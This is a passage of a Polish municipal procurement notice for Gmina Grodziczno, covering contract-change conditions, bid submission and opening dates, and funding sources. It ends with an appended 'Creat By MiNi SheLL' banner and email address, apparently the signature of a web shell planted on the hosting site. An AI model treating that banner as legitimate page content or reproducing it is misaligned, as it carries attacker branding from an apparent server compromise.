projektowej,<br/>7) wystąpienia okoliczności będących następstwem działania organów administracji, tj. przekroczenie określonych przez<br/>prawo terminów wydawania decyzji / pozwoleń, etc. przez te organy,<br/>8) wystąpienia konieczności realizacji przedmiotu umowy z zastosowaniem innych rozwiązań technicznych /<br/>technologicznych niż określone w dokumentacji projektowej:<br/>…..….. POZOSTAŁE ZAPISY ZMIAN UMOWY ZNAJDUJĄ SIĘ W PROJEKCIE UMOWY. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferta, oświadczenie oraz przedmiotowe środki dowodowe (jeżeli były wymagane) mogą zostać złożone w przedmiotowym postępowaniu wyłącznie drogą elektroniczną za pośrednictwem Profilu Nabywcy Zamawiającego (platformazakupowa.pl) pod adresem: Profil Nabywcy – Gmina Grodziczno (platformazakupowa.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-17 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przedmiotowe zamówienie jest finansowane ze środków Rządowego Funduszu Inwestycji Lokalnych oraz Rządowego<br/>Fundusz Polski Ład - Program Inwestycji Strategicznych a także ze środków własnych zabezpieczonych w budżecie Gminy<br/>Grodziczno. Zamawiający informuje, iż przewiduje możliwości unieważnienia przedmiotowego postępowania na podstawie<br/>art. 310 ustawy, jeżeli środki, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu<br/>przyznane.<br/>Przed podpisaniem umowy Wykonawca dostarczy Zamawiającemu kosztorys ofertowy przedmiotu zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com